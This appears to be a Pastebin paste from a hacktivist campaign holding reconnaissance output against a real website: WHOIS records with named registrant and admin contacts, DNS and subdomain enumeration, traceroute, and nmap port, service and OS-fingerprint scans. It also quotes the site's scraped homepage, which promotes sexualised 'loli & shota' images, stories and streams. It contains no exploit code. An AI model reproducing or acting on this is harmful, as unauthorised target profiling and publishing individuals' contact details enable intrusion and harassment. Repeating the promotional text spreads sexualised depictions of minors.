daily pastebin goal
38%
SHARE
TWEET

HunterUnit JTSEC pedo link for protecte child #48

a guest Dec 23rd, 2017 1,607 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ######################################################################################################################################
  2. Nom de l'hôte  allthefallen.ninja      FAI     WorldStream B.V. (AS49981)
  3. Continent   Europe      Drapeau    
  4. NL
  5. Pays    Pays-Bas        Code du pays    NL (NLD)
  6. Région     Inconnu         Heure locale    21 Dec 2017 19:07 CET
  7. Ville   Inconnu         Latitude    52.382
  8. Adresse IP  178.132.1.137       Longitude   4.899
  9. #######################################################################################################################################
  10. [i] Scanning Site: https://allthefallen.ninja
  11.  
  12.  
  13.  
  14. B A S I C   I N F O
  15. ====================
  16.  
  17.  
  18. [+] Site Title: All the Fallen
  19. [+] IP address: 178.132.1.137
  20. [+] Web Server: nginx
  21. [+] CMS: Could Not Detect
  22. [+] Cloudflare: Not Detected
  23. [+] Robots File: Found
  24.  
  25. -------------[ contents ]----------------  
  26. <!DOCTYPE html>
  27. <html lang="en">
  28.  
  29.   <head>
  30.  
  31.     <meta charset="utf-8">
  32.     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  33.     <meta name="description" content="">
  34.     <meta name="author" content="">
  35.  
  36.     <title>All the Fallen</title>
  37.  
  38.     <!-- Bootstrap core CSS -->
  39.     <link href="catchpage/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  40.  
  41.     <!-- Custom styles for this template -->
  42.     <link href="catchpage/css/heroic-features.css" rel="stylesheet">
  43.  
  44.   </head>
  45.  
  46.   <body>
  47.  
  48.     <!-- Navigation -->
  49.  
  50.     <!-- Page Content -->
  51.     <div class="container">
  52.  
  53.       <!-- Jumbotron Header -->
  54.       <header class="jumbotron my-4 text-center">
  55.         <h1 class="display-3">Welcome to All the Fallen!</h1>
  56.         <p class="lead">This is a simple page for now, we'll be improving this page to fit with our other themes soon!</p>
  57.       </header>
  58.  
  59.       <!-- Page Features -->
  60.       <div class="row text-center">
  61.  
  62.         <div class="col-lg-3 col-md-6 mb-4">
  63.           <div class="card">
  64.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  65.             <div class="card-body">
  66.               <h4 class="card-title">Forum</h4>
  67.               <p class="card-text">Access the forum here!.</p>
  68.             </div>
  69.             <div class="card-footer">
  70.               <a href="/forum" class="btn btn-primary">All the Forums!</a>
  71.             </div>
  72.           </div>
  73.         </div>
  74.  
  75.         <div class="col-lg-3 col-md-6 mb-4">
  76.           <div class="card">
  77.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  78.             <div class="card-body">
  79.               <h4 class="card-title">Gallery/Booru</h4>
  80.               <p class="card-text">Visit the gallery(booru) for all kinds of loli & shota images.</p>
  81.             </div>
  82.             <div class="card-footer">
  83.               <a href="https://atfbooru.ninja" class="btn btn-primary">ATF Booru!</a>
  84.             </div>
  85.           </div>
  86.         </div>
  87.  
  88.         <div class="col-lg-3 col-md-6 mb-4">
  89.           <div class="card">
  90.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  91.             <div class="card-body">
  92.               <h4 class="card-title">Streaming</h4>
  93.               <p class="card-text">Getting tired of streaming services banning any kind of Loli & Shota content or banning you for stupid reasons, we don't do that on our streaming service!</p>
  94.             </div>
  95.             <div class="card-footer">
  96.               <a href="https://stream.allthefallen.ninja" class="btn btn-primary">All the Streams!</a>
  97.             </div>
  98.           </div>
  99.         </div>
  100.         <div class="col-lg-3 col-md-6 mb-4">
  101.           <div class="card">
  102.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  103.             <div class="card-body">
  104.               <h4 class="card-title">Translations</h4>
  105.               <p class="card-text">Want to jank it to translated doujins look here and have fun janking it.!</p>
  106.             </div>
  107.             <div class="card-footer">
  108.               <a href="https://translations.allthefallen.ninja" class="btn btn-primary">All the Translations!</a>
  109.             </div>
  110.           </div>
  111.         </div>
  112.  
  113.  
  114.       </div>
  115.      
  116.     <div class="row text-center">
  117.         <div class="col-lg-3 col-md-6 mb-4">
  118.           <div class="card">
  119.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  120.             <div class="card-body">
  121.               <h4 class="card-title">Stories</h4>
  122.               <p class="card-text">Want to read a sexy story involving loli & shota go here.</p>
  123.             </div>
  124.             <div class="card-footer">
  125.               <a href="https://stories.allthefallen.ninja" class="btn btn-primary">All the stories!</a>
  126.             </div>
  127.           </div>
  128.         </div>
  129.  
  130.         <div class="col-lg-3 col-md-6 mb-4">
  131.           <div class="card">
  132.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  133.             <div class="card-body">
  134.               <h4 class="card-title">Mods</h4>
  135.               <p class="card-text">Want to make playing a game more sexy, look here.</p>
  136.             </div>
  137.             <div class="card-footer">
  138.               <a href="https://mods.allthefallen.ninja" class="btn btn-primary">All the Mods!</a>
  139.             </div>
  140.           </div>
  141.         </div>
  142.  
  143.         <div class="col-lg-3 col-md-6 mb-4">
  144.           <div class="card">
  145.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  146.             <div class="card-body">
  147.               <h4 class="card-title">Blogs</h4>
  148.               <p class="card-text">You can make a blog here or read other people blogs!</p>
  149.             </div>
  150.             <div class="card-footer">
  151.               <a href="https://blogs.allthefallen.ninja" class="btn btn-primary">All The Blogs!</a>
  152.             </div>
  153.           </div>
  154.         </div>
  155.  
  156.         <div class="col-lg-3 col-md-6 mb-4">
  157.           <div class="card">
  158.             <img class="card-img-top" src="http://placehold.it/500x325" alt="">
  159.             <div class="card-body">
  160.               <h4 class="card-title">All the Fallen Git</h4>
  161.               <p class="card-text">Git gud</p>
  162.             </div>
  163.             <div class="card-footer">
  164.               <a href="https://git.allthefallen.ninja/" class="btn btn-primary">All The Gits!</a>
  165.             </div>
  166.           </div>
  167.         </div>
  168.  
  169.       </div>
  170.       <!-- /.row -->
  171.  
  172.     </div>
  173.     <!-- /.container -->
  174.  
  175.     <!-- Footer -->
  176.     <footer class="py-2">
  177.       <div class="container">
  178.         <p class="m-0 text-center text-black">Copyright &copy; All The Fallen 2015 - 2017</p>
  179.       </div>
  180.       <!-- /.container -->
  181.     </footer>
  182.  
  183.     <!-- Bootstrap core JavaScript -->
  184.     <script src="catchpage/vendor/jquery/jquery.min.js"></script>
  185.     <script src="catchpage/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
  186.  
  187.   </body>
  188.  
  189. </html>
  190.  
  191. -----------[end of contents]-------------
  192.  
  193.  
  194.  
  195. W H O I S   L O O K U P
  196. ========================
  197.  
  198.     Domain Name: allthefallen.ninja
  199. Registry Domain ID: 9b104e31e74549e6a85a1f86e9aed1ed-RSIDE
  200. Registrar WHOIS Server: www.ovh.com/cgi-bin/whois.pl
  201. Registrar URL: http://www.ovh.com
  202. Updated Date: 2017-10-09T17:58:35Z
  203. Creation Date: 2015-03-21T06:25:40Z
  204. Registry Expiry Date: 2018-03-21T06:25:40Z
  205. Registrar: OVH SAS
  206. Registrar IANA ID: 433
  207. Registrar Abuse Contact Email:
  208. Registrar Abuse Contact Phone:
  209. Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
  210. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  211. Registry Registrant ID: fbec711e9dcd4d219c46dfcc9fff3e69-RSIDE
  212. Registrant Name: Conor Aoihino
  213. Registrant Organization:
  214. Registrant Street: office #8912666 c/o OwO, BP80157
  215. Registrant City: Roubaix Cedex 1
  216. Registrant State/Province:
  217. Registrant Postal Code: 59053
  218. Registrant Country: FR
  219. Registrant Phone: +33.972101007
  220. Registrant Phone Ext:
  221. Registrant Fax:
  222. Registrant Fax Ext:
  223. Registrant Email: ok1nr92vksn9v40on6yk@w.o-w-o.info
  224. Registry Admin ID: 4ce5139f7ef64cccae00b13b5359de9d-RSIDE
  225. Admin Name: Michel Kleine Deters
  226. Admin Organization:
  227. Admin Street: office #8912666 c/o OwO, BP80157
  228. Admin City: Roubaix Cedex 1
  229. Admin State/Province:
  230. Admin Postal Code: 59053
  231. Admin Country: FR
  232. Admin Phone: +33.972101007
  233. Admin Phone Ext:
  234. Admin Fax:
  235. Admin Fax Ext:
  236. Admin Email: ojafihf06palb4pl1k6l@b.o-w-o.info
  237. Registry Tech ID: 4ce5139f7ef64cccae00b13b5359de9d-RSIDE
  238. Tech Name: Michel Kleine Deters
  239. Tech Organization:
  240. Tech Street: office #8912666 c/o OwO, BP80157
  241. Tech City: Roubaix Cedex 1
  242. Tech State/Province:
  243. Tech Postal Code: 59053
  244. Tech Country: FR
  245. Tech Phone: +33.972101007
  246. Tech Phone Ext:
  247. Tech Fax:
  248. Tech Fax Ext:
  249. Tech Email: ojafihf06palb4pl1k6l@b.o-w-o.info
  250. Name Server: server.allthefallen.ninja
  251. Name Server: serverns1.allthefallen.ninja
  252. DNSSEC: unsigned
  253. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  254. >>> Last update of WHOIS database: 2017-12-21T18:08:47Z <<<
  255.  
  256. For more information on Whois status codes, please visit https://icann.org/epp
  257.  
  258. Terms of Use: Users accessing the Rightside WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: Allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers. Enable high volume, automated, electronic processes that send queries or data to the systems of Rightside or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Rightside Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources.
  259.  
  260.  
  261.  
  262.  
  263. G E O  I P  L O O K  U P
  264. =========================
  265.  
  266. [i] IP Address: 178.132.1.137
  267. [i] Country: NL
  268. [i] State: N/A
  269. [i] City: N/A
  270. [i] Latitude: 52.382401
  271. [i] Longitude: 4.899500
  272.  
  273.  
  274.  
  275.  
  276. H T T P   H E A D E R S
  277. =======================
  278.  
  279.  
  280. [i]  HTTP/1.1 200 OK
  281. [i]  Server: nginx
  282. [i]  Date: Thu, 21 Dec 2017 18:11:13 GMT
  283. [i]  Content-Type: text/html; charset=UTF-8
  284. [i]  Connection: close
  285. [i]  X-Frame-Options: SAMEORIGIN
  286. [i]  X-Content-Type-Options: nosniff
  287. [i]  X-XSS-Protection: 1; mode=block
  288. [i]  Strict-Transport-Security: max-age=31536000
  289.  
  290.  
  291.  
  292.  
  293. D N S   L O O K U P
  294. ===================
  295.  
  296. allthefallen.ninja. 10799   IN  A   178.132.1.137
  297. allthefallen.ninja. 10799   IN  NS  ns1.allthefallen.ninja.
  298. allthefallen.ninja. 10799   IN  SOA ns1.allthefallen.ninja. hostmaster.allthefallen.ninja. 2017111800 10800 3600 1209600 3600
  299. allthefallen.ninja. 10799   IN  TXT "v=spf1 a mx -all"
  300. allthefallen.ninja. 10799   IN  MX  10 mail.allthefallen.ninja.
  301.  
  302.  
  303.  
  304.  
  305. S U B N E T   C A L C U L A T I O N
  306. ====================================
  307.  
  308. Address       = 178.132.1.137
  309. Network       = 178.132.1.137 / 32
  310. Netmask       = 255.255.255.255
  311. Broadcast     = not needed on Point-to-Point links
  312. Wildcard Mask = 0.0.0.0
  313. Hosts Bits    = 0
  314. Max. Hosts    = 1   (2^0 - 0)
  315. Host Range    = { 178.132.1.137 - 178.132.1.137 }
  316.  
  317.  
  318.  
  319. N M A P   P O R T   S C A N
  320. ============================
  321.  
  322.  
  323. Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-21 18:11 UTC
  324. Nmap scan report for allthefallen.ninja (178.132.1.137)
  325. Host is up (0.083s latency).
  326. rDNS record for 178.132.1.137: server.allthefallen.ninja
  327. PORT     STATE  SERVICE       VERSION
  328. 21/tcp   open   ftp           ProFTPD
  329. 22/tcp   open   ssh           OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
  330. 23/tcp   closed telnet
  331. 25/tcp   open   smtp          Postfix smtpd
  332. 80/tcp   open   http          nginx
  333. 110/tcp  open   pop3          Dovecot pop3d
  334. 143/tcp  open   imap          Dovecot imapd
  335. 443/tcp  open   ssl/http      nginx
  336. 445/tcp  closed microsoft-ds
  337. 3389/tcp closed ms-wbt-server
  338. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  339.  
  340. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  341. Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
  342.  
  343.  
  344.  
  345. S U B - D O M A I N   F I N D E R
  346. ==================================
  347.  
  348.  
  349. [i] Total Subdomains Found : 10
  350.  
  351. [+] Subdomain: social.allthefallen.ninja
  352. [-] IP: 178.132.1.137
  353.  
  354. [+] Subdomain: panel.allthefallen.ninja
  355. [-] IP: 178.132.1.137
  356.  
  357. [+] Subdomain: mail.allthefallen.ninja
  358. [-] IP: 178.132.1.137
  359.  
  360. [+] Subdomain: stream.allthefallen.ninja
  361. [-] IP: 178.132.1.137
  362.  
  363. [+] Subdomain: mods.allthefallen.ninja
  364. [-] IP: 178.132.1.137
  365.  
  366. [+] Subdomain: stories.allthefallen.ninja
  367. [-] IP: 178.132.1.137
  368.  
  369. [+] Subdomain: mail.stories.allthefallen.ninja
  370. [-] IP: 178.132.1.137
  371.  
  372. [+] Subdomain: blogs.allthefallen.ninja
  373. [-] IP: 178.132.1.137
  374.  
  375. [+] Subdomain: translations.allthefallen.ninja
  376. [-] IP: 178.132.1.137
  377.  
  378. [+] Subdomain: streamserv.allthefallen.ninja
  379. [-] IP: 178.132.1.139
  380. | [*] New target is: http://allthefallen.ninja/
  381. ===================================================================================================
  382. | Domain: http://allthefallen.ninja/
  383. | Server: nginx
  384. | IP: 178.132.1.137
  385. ===================================================================================================
  386. ===================================================================================================
  387. | PING
  388. |
  389. | PING allthefallen.ninja (178.132.1.137) 56(84) bytes of data.
  390. | 64 bytes from 178.132.1.137: icmp_seq=1 ttl=53 time=116 ms
  391. |
  392. | --- allthefallen.ninja ping statistics ---
  393. | 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  394. | rtt min/avg/max/mdev = 116.962/116.962/116.962/0.000 ms
  395. ===================================================================================================
  396. | TRACEROUTE
  397. |
  398. | traceroute to allthefallen.ninja (178.132.1.137), 30 hops max, 60 byte packets
  399. |  1  10.13.0.1 (10.13.0.1)  108.671 ms  109.597 ms  110.027 ms
  400. |  2  37.187.24.253 (37.187.24.253)  110.236 ms  110.240 ms  110.480 ms
  401. |  3  10.50.225.61 (10.50.225.61)  110.021 ms  110.063 ms  110.069 ms
  402. |  4  10.17.129.46 (10.17.129.46)  110.184 ms 10.17.129.42 (10.17.129.42)  110.428 ms 10.17.129.46 (10.17.129.46)  217.433 ms
  403. |  5  10.73.0.50 (10.73.0.50)  109.997 ms 10.73.0.52 (10.73.0.52)  110.014 ms 10.73.0.50 (10.73.0.50)  109.995 ms
  404. |  6  * 10.95.33.10 (10.95.33.10)  110.575 ms *
  405. |  7  be100-1112.ams-5-a9.nl.eu (213.251.128.67)  117.259 ms  117.726 ms  117.740 ms
  406. |  8  * be100-2.ams-1-a9.nl.eu (94.23.122.230)  117.730 ms  117.731 ms
  407. |  9  109.236.95.111 (109.236.95.111)  118.168 ms * 109.236.95.113 (109.236.95.113)  118.117 ms
  408. | 10  109.236.95.111 (109.236.95.111)  225.305 ms  225.317 ms  225.298 ms
  409. | 11  server.allthefallen.ninja (178.132.1.137)  118.286 ms  118.300 ms  116.639 ms
  410. ===================================================================================================
  411. | NSLOOKUP
  412. |
  413. | Server:       2001:568:ff09:10c::53
  414. | Address:  2001:568:ff09:10c::53#53
  415. |
  416. | Non-authoritative answer:
  417. | allthefallen.ninja    mail exchanger = 10 mail.allthefallen.ninja.
  418. | Authoritative answers can be found from:
  419. | *** Can't find allthefallen.ninja: No answer
  420. | allthefallen.ninja
  421. |   origin = ns1.allthefallen.ninja
  422. |   mail addr = hostmaster.allthefallen.ninja
  423. |   serial = 2017111800
  424. |   refresh = 10800
  425. |   retry = 3600
  426. |   expire = 1209600
  427. |   minimum = 3600
  428. | allthefallen.ninja    nameserver = ns1.allthefallen.ninja.
  429. | Name: allthefallen.ninja
  430. | Address: 178.132.1.137
  431. | allthefallen.ninja    text = "v=spf1 a mx -all"
  432. ===================================================================================================
  433. | NMAP
  434. |
  435. |
  436. | Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-21 13:13 EST
  437. | NSE: Loaded 146 scripts for scanning.
  438. | NSE: Script Pre-scanning.
  439. | Initiating NSE at 13:14
  440. | Completed NSE at 13:14, 0.00s elapsed
  441. | Initiating NSE at 13:14
  442. | Completed NSE at 13:14, 0.00s elapsed
  443. | Initiating Ping Scan at 13:14
  444. | Scanning allthefallen.ninja (178.132.1.137) [4 ports]
  445. | Completed Ping Scan at 13:14, 0.16s elapsed (1 total hosts)
  446. | Initiating Parallel DNS resolution of 1 host. at 13:14
  447. | Completed Parallel DNS resolution of 1 host. at 13:14, 0.48s elapsed
  448. | Initiating SYN Stealth Scan at 13:14
  449. | Scanning allthefallen.ninja (178.132.1.137) [1000 ports]
  450. | Discovered open port 80/tcp on 178.132.1.137
  451. | Discovered open port 993/tcp on 178.132.1.137
  452. | Discovered open port 22/tcp on 178.132.1.137
  453. | Discovered open port 143/tcp on 178.132.1.137
  454. | Discovered open port 443/tcp on 178.132.1.137
  455. | Discovered open port 53/tcp on 178.132.1.137
  456. | Discovered open port 21/tcp on 178.132.1.137
  457. | Discovered open port 995/tcp on 178.132.1.137
  458. | Discovered open port 110/tcp on 178.132.1.137
  459. | Discovered open port 9000/tcp on 178.132.1.137
  460. | Discovered open port 8443/tcp on 178.132.1.137
  461. | Completed SYN Stealth Scan at 13:14, 19.62s elapsed (1000 total ports)
  462. | Initiating Service scan at 13:14
  463. | Scanning 11 services on allthefallen.ninja (178.132.1.137)
  464. | Completed Service scan at 13:14, 21.37s elapsed (11 services on 1 host)
  465. | Initiating OS detection (try #1) against allthefallen.ninja (178.132.1.137)
  466. | Retrying OS detection (try #2) against allthefallen.ninja (178.132.1.137)
  467. | Initiating Traceroute at 13:14
  468. | Completed Traceroute at 13:14, 3.00s elapsed
  469. | Initiating Parallel DNS resolution of 8 hosts. at 13:14
  470. | Completed Parallel DNS resolution of 8 hosts. at 13:15, 11.61s elapsed
  471. | NSE: Script scanning 178.132.1.137.
  472. | Initiating NSE at 13:15
  473. | Completed NSE at 13:15, 22.12s elapsed
  474. | Initiating NSE at 13:15
  475. | Completed NSE at 13:15, 0.00s elapsed
  476. | Nmap scan report for allthefallen.ninja (178.132.1.137)
  477. | Host is up (0.12s latency).
  478. | rDNS record for 178.132.1.137: server.allthefallen.ninja
  479. | Not shown: 982 closed ports
  480. | PORT     STATE    SERVICE      VERSION
  481. | 21/tcp   open     ftp          ProFTPD
  482. | |_ssl-date: TLS randomness does not represent time
  483. | 22/tcp   open     ssh          OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
  484. | | ssh-hostkey:
  485. | |   2048 48:c7:a1:62:f8:fd:71:c6:8b:90:0b:71:c5:ba:2d:86 (RSA)
  486. | |   256 8e:b2:80:91:b3:40:7f:24:86:da:be:24:51:35:1e:de (ECDSA)
  487. | |_  256 25:32:68:65:39:cd:89:03:b7:33:6a:45:84:f1:8b:2c (EdDSA)
  488. | 25/tcp   filtered smtp
  489. | 53/tcp   open     domain       ISC BIND i-MSCP DNS Server
  490. | | dns-nsid:
  491. | |_  bind.version: i-MSCP DNS Server
  492. | 80/tcp   open     http         nginx
  493. | | http-methods:
  494. | |_  Supported Methods: HEAD POST
  495. | |_http-server-header: nginx
  496. | |_http-title: Did not follow redirect to https://allthefallen.ninja/
  497. | 110/tcp  open     pop3         Dovecot pop3d
  498. | |_pop3-capabilities: AUTH-RESP-CODE PIPELINING UIDL USER TOP STLS SASL(PLAIN LOGIN) RESP-CODES CAPA
  499. | | ssl-cert: Subject: commonName=server.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  500. | | Subject Alternative Name: DNS:server.allthefallen.ninja, DNS:www.server.allthefallen.ninja
  501. | | Issuer: commonName=server.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  502. | | Public Key type: rsa
  503. | | Public Key bits: 2048
  504. | | Signature Algorithm: sha256WithRSAEncryption
  505. | | Not valid before: 2017-08-13T00:49:03
  506. | | Not valid after:  2018-08-13T00:49:03
  507. | | MD5:   efd9 5d62 6949 5c11 8796 fcb4 a277 f5c2
  508. | |_SHA-1: 6241 686f 86cc 75a5 3150 d8df 5a17 2030 c465 1c28
  509. | |_ssl-date: TLS randomness does not represent time
  510. | 135/tcp  filtered msrpc
  511. | 139/tcp  filtered netbios-ssn
  512. | 143/tcp  open     imap         Dovecot imapd
  513. | |_imap-capabilities: post-login ID LITERAL+ SASL-IR LOGIN-REFERRALS OK Pre-login listed IDLE more have ENABLE AUTH=LOGINA0001 capabilities IMAP4rev1 STARTTLS AUTH=PLAIN
  514. | | ssl-cert: Subject: commonName=server.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  515. | | Subject Alternative Name: DNS:server.allthefallen.ninja, DNS:www.server.allthefallen.ninja
  516. | | Issuer: commonName=server.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  517. | | Public Key type: rsa
  518. | | Public Key bits: 2048
  519. | | Signature Algorithm: sha256WithRSAEncryption
  520. | | Not valid before: 2017-08-13T00:49:03
  521. | | Not valid after:  2018-08-13T00:49:03
  522. | | MD5:   efd9 5d62 6949 5c11 8796 fcb4 a277 f5c2
  523. | |_SHA-1: 6241 686f 86cc 75a5 3150 d8df 5a17 2030 c465 1c28
  524. | |_ssl-date: TLS randomness does not represent time
  525. | 179/tcp  filtered bgp
  526. | 443/tcp  open     ssl/http     nginx
  527. | | http-methods:
  528. | |_  Supported Methods: HEAD
  529. | |_http-title: 400 The plain HTTP request was sent to HTTPS port
  530. | | ssl-cert: Subject: commonName=allthefallen.ninja
  531. | | Subject Alternative Name: DNS:allthefallen.ninja, DNS:www.allthefallen.ninja
  532. | | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
  533. | | Public Key type: rsa
  534. | | Public Key bits: 2048
  535. | | Signature Algorithm: sha256WithRSAEncryption
  536. | | Not valid before: 2017-12-16T22:49:24
  537. | | Not valid after:  2018-03-16T22:49:24
  538. | | MD5:   ba21 cb8a 01e9 adb5 d1e6 6a58 1293 6451
  539. | |_SHA-1: 42df af76 ab45 26ad 27ed caa0 9216 b2bf 417d 3827
  540. | |_ssl-date: TLS randomness does not represent time
  541. | | tls-nextprotoneg:
  542. | |_  http/1.1
  543. | 445/tcp  filtered microsoft-ds
  544. | 465/tcp  filtered smtps
  545. | 587/tcp  filtered submission
  546. | 993/tcp  open     ssl/imap     Dovecot imapd
  547. | | ssl-cert: Subject: commonName=server.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  548. | | Subject Alternative Name: DNS:server.allthefallen.ninja, DNS:www.server.allthefallen.ninja
  549. | | Issuer: commonName=server.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  550. | | Public Key type: rsa
  551. | | Public Key bits: 2048
  552. | | Signature Algorithm: sha256WithRSAEncryption
  553. | | Not valid before: 2017-08-13T00:49:03
  554. | | Not valid after:  2018-08-13T00:49:03
  555. | | MD5:   efd9 5d62 6949 5c11 8796 fcb4 a277 f5c2
  556. | |_SHA-1: 6241 686f 86cc 75a5 3150 d8df 5a17 2030 c465 1c28
  557. | |_ssl-date: TLS randomness does not represent time
  558. | 995/tcp  open     ssl/pop3     Dovecot pop3d
  559. | | ssl-cert: Subject: commonName=server.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  560. | | Subject Alternative Name: DNS:server.allthefallen.ninja, DNS:www.server.allthefallen.ninja
  561. | | Issuer: commonName=server.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  562. | | Public Key type: rsa
  563. | | Public Key bits: 2048
  564. | | Signature Algorithm: sha256WithRSAEncryption
  565. | | Not valid before: 2017-08-13T00:49:03
  566. | | Not valid after:  2018-08-13T00:49:03
  567. | | MD5:   efd9 5d62 6949 5c11 8796 fcb4 a277 f5c2
  568. | |_SHA-1: 6241 686f 86cc 75a5 3150 d8df 5a17 2030 c465 1c28
  569. | |_ssl-date: TLS randomness does not represent time
  570. | 8443/tcp open     ssl/http     nginx
  571. | |_http-title: Did not follow redirect to https://panel.allthefallen.ninja:8443/
  572. | | ssl-cert: Subject: commonName=panel.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  573. | | Subject Alternative Name: DNS:panel.allthefallen.ninja, DNS:www.panel.allthefallen.ninja
  574. | | Issuer: commonName=panel.allthefallen.ninja/organizationName=N/A/stateOrProvinceName=N/A/countryName=US
  575. | | Public Key type: rsa
  576. | | Public Key bits: 2048
  577. | | Signature Algorithm: sha256WithRSAEncryption
  578. | | Not valid before: 2017-08-13T00:49:15
  579. | | Not valid after:  2018-08-13T00:49:15
  580. | | MD5:   0327 b90f aebd 2530 5f2b 1f02 fd82 6d23
  581. | |_SHA-1: bd25 8020 0bd5 2d34 62f6 c86a 6ce7 41e9 2937 c95e
  582. | |_ssl-date: TLS randomness does not represent time
  583. | | tls-nextprotoneg:
  584. | |_  http/1.1
  585. | 9000/tcp open     websocket
  586. | | fingerprint-strings:
  587. | |   GenericLines:
  588. | |     HTTP/1.1 101 Web Socket Protocol Handshake
  589. | |     Upgrade: websocket
  590. | |     Connection: Upgrade
  591. | |     WebSocket-Origin: 0.0.0.0
  592. | |     WebSocket-Location: ws://0.0.0.0:9000/demo/shout.php
  593. | |     Sec-WebSocket-Accept:Kfh9QIsMVZcl6xEPYxPHzW8SZ8w=
  594. | |     4{"type":"system","message":"87.98.166.29 connected"}
  595. | |     7{"type":"system","message":"87.98.166.29 disconnected"}
  596. | |   GetRequest, HTTPOptions:
  597. | |     HTTP/1.1 101 Web Socket Protocol Handshake
  598. | |     Upgrade: websocket
  599. | |     Connection: Upgrade
  600. | |     WebSocket-Origin: 0.0.0.0
  601. | |     WebSocket-Location: ws://0.0.0.0:9000/demo/shout.php
  602. | |     Sec-WebSocket-Accept:Kfh9QIsMVZcl6xEPYxPHzW8SZ8w=
  603. | |_    4{"type":"system","message":"87.98.166.29 connected"}
  604. | 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  605. | SF-Port9000-TCP:V=7.60%I=7%D=12/21%Time=5A3BFA0F%P=x86_64-pc-linux-gnu%r(G
  606. | SF:enericLines,14A,"HTTP/1\.1\x20101\x20Web\x20Socket\x20Protocol\x20Hands
  607. | SF:hake\r\nUpgrade:\x20websocket\r\nConnection:\x20Upgrade\r\nWebSocket-Or
  608. | SF:igin:\x200\.0\.0\.0\r\nWebSocket-Location:\x20ws://0\.0\.0\.0:9000/demo
  609. | SF:/shout\.php\r\nSec-WebSocket-Accept:Kfh9QIsMVZcl6xEPYxPHzW8SZ8w=\r\n\r\
  610. | SF:n\x814{\"type\":\"system\",\"message\":\"87\.98\.166\.29\x20connected\"
  611. | SF:}\x817{\"type\":\"system\",\"message\":\"87\.98\.166\.29\x20disconnecte
  612. | SF:d\"}")%r(GetRequest,111,"HTTP/1\.1\x20101\x20Web\x20Socket\x20Protocol\
  613. | SF:x20Handshake\r\nUpgrade:\x20websocket\r\nConnection:\x20Upgrade\r\nWebS
  614. | SF:ocket-Origin:\x200\.0\.0\.0\r\nWebSocket-Location:\x20ws://0\.0\.0\.0:9
  615. | SF:000/demo/shout\.php\r\nSec-WebSocket-Accept:Kfh9QIsMVZcl6xEPYxPHzW8SZ8w
  616. | SF:=\r\n\r\n\x814{\"type\":\"system\",\"message\":\"87\.98\.166\.29\x20con
  617. | SF:nected\"}")%r(HTTPOptions,111,"HTTP/1\.1\x20101\x20Web\x20Socket\x20Pro
  618. | SF:tocol\x20Handshake\r\nUpgrade:\x20websocket\r\nConnection:\x20Upgrade\r
  619. | SF:\nWebSocket-Origin:\x200\.0\.0\.0\r\nWebSocket-Location:\x20ws://0\.0\.
  620. | SF:0\.0:9000/demo/shout\.php\r\nSec-WebSocket-Accept:Kfh9QIsMVZcl6xEPYxPHz
  621. | SF:W8SZ8w=\r\n\r\n\x814{\"type\":\"system\",\"message\":\"87\.98\.166\.29\
  622. | SF:x20connected\"}");
  623. | Aggressive OS guesses: Linux 3.11 - 4.1 (95%), Linux 3.13 (92%), Linux 2.6.39 (92%), Linux 3.16 (92%), Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 2.6.32 (91%), Linux 3.2 - 3.8 (91%), Linux 3.8 (91%), WatchGuard Fireware 11.8 (91%)
  624. | No exact OS matches for host (test conditions non-ideal).
  625. | Uptime guess: 50.795 days (since Tue Oct 31 19:09:59 2017)
  626. | Network Distance: 10 hops
  627. | TCP Sequence Prediction: Difficulty=262 (Good luck!)
  628. | IP ID Sequence Generation: All zeros
  629. | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  630. |
  631. | TRACEROUTE (using port 8888/tcp)
  632. | HOP RTT       ADDRESS
  633. | 1   109.26 ms 10.13.0.1
  634. | 2   109.87 ms 37.187.24.253
  635. | 3   109.31 ms 10.50.225.61
  636. | 4   109.91 ms 10.17.129.40
  637. | 5   109.31 ms 10.73.0.50
  638. | 6   ...
